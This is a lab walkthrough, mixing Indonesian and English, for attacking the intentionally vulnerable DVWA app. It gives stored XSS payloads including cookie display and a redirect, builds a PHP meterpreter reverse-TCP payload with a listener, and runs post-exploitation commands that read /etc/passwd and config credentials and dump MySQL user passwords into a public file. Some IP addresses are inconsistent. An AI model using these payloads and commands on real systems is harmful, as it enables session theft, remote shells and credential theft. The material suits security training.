DVWA: XSS
sumber: http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson9/index.html
Tujuan
- Test a basic cross site scripting (XSS) attack
- Test an iframe cross site scripting (XSS) attack
- Test a cookie cross site scripting (XSS) attack
- Create a php/meterpreter/reverse_tcp payload
- Start the php/meterpreter/reverse_tcp listener
- Upload the PHP payload to the DVWA Upload screen
- Test a PHP Payload cross site scripting (XSS) attack
Di sisi DVWA
Cek IP
ifconfig
Fix Stored Cross Site Scripting (XSS) Comment Box
Edit index.php
cd /var/www/html/DVWA-1.9/vulnerabilities/xss_s/ vi index.php
Search dengan keyword mtxMessage Ubah maxlength=50
<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"50\"></textarea>
menjadi maxlength=250
<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"250\"></textarea>
Di sisi Kali Linux
Cek IP Kali Linux
ifconfig -a
Enable Javascript di Browser
Buka Firefox Preferences > Content > Uncheck - Block pop-up windows
Masuk ke DVWA
- Login
- DVWA Security > Low
XSS Stored Basic Exploit Test
- Klik > XSS (Stored)
- Pada Name isi "Test 1"
- Pada Message isi "<script>alert("This is a XSS Exploit Test")</script>"
- Klik > Sign Guestbook
XSS Stored IFRAME Exploit Test
- Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
- Klik > XSS (Stored)
- Pada Nama isi "Test 2"
- Pada Message isi "<iframe src="http://www.cnn.com"></iframe>"
- Klik > Sign Guestbook
Tampak bahwa CNN muncul di bawah "Test 2" .
This is a powerful exploit because a user could use SET to create Malicious cloned website and place in here. e.g., Social Engineering Toolkit (SET): Lesson 3: Create Malicious Weblink, Install Virus, Capture Forensic Images
XSS Stored COOKIE Exploit Test
- Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
- Klik > XSS (Stored)
- Pada Nama isi "Test 3"
- Pada Message isi "<script>alert(document.cookie)</script>"
- Klik > Sign Guestbook
Below is the cookie/session that the webserver establishes with the current browser session. An attacker could easily modify this XSS script to send the cookie to a remote location instead of displaying it. Image if this was a bank website. Every time a user logs in their cookie information could be sent to a remote location.
Build PHP msfpayload
mkdir -p /root/backdoor cd /root/backdoor msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 R > FORUM_BUG.php ls -l FORUM_BUG.php
Select "Upload" from the left navigation menu. Click Browse
Start msfconsole
msfconsole
use exploit/multi/handler set PAYLOAD php/meterpreter/reverse_tcp set LHOST 192.168.1.105 set LPORT 4444 exploit
XSS Stored window.location Exploit Test
- Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
- Klik > XSS (Stored)
Name: Test 4 Message:
<script>window.location="http://192.168.0.100/DVWA-1.9/hackable/uploads/FORUM_BUG.php" </script> Replace 192.168.1.106 with the IP Address obtain from Fedora 14 in (Section 3, Step 3).
Click Sign Guestbook Click OK when the Test 1 Message is displayed
shell
Establishes a "sh" shell.
tail /etc/passwd
This produces a potential prospect list for a ssh brute force attack
whoami Displays the name of the user. grep apache /etc/passwd The goal of this command is obtaining the home directory for the apache username. find /var/www/* -print | grep config Here I am wanting to find all the configuration files in the /var/www directory.
grep "db_" /var/www/html/dvwa/config/config.inc.php This produces the database name, username, and password information to log into the mysql database. echo "use dvwa; show tables;" | mysql -uroot -p123456 This command produces a table list of the dvwa database. echo "use dvwa; desc users;" | mysql -uroot -p123456 This command describes the columns of the users table in the dvwa datase. echo "select user,password from dvwa.users;" | mysql -uroot -p123456 This command displays the user and password information for each user in the dvwa.users table.
echo "
" >> /var/www/html/dvwa/hackable/uploads/xss.html Place the html <pre> tag in the xss.html file. The <pre> is used as a pre-formatter. echo "select user,password from dvwa.users;" | mysql -uroot -p123456 >> /var/www/html/dvwa/hackable/uploads/xss.html Place user and password for the dvwa.users table in the xss.html file. echo "
" >> /var/www/html/dvwa/hackable/uploads/xss.html Place the close html tag in the xss.html file.
echo "
Your Name
" >> /var/www/html/dvwa/hackable/uploads/xss.html Replace the string "Your Name" with your actual name. date >> /var/www/html/dvwa/hackable/uploads/xss.html
On BackTrack, place the below URI in Firefox http://192.168.0.100/DVWA-1.9/hackable/uploads/xss.html Replace the above IP address with the IP Address obtained in (Section 3, Step 3).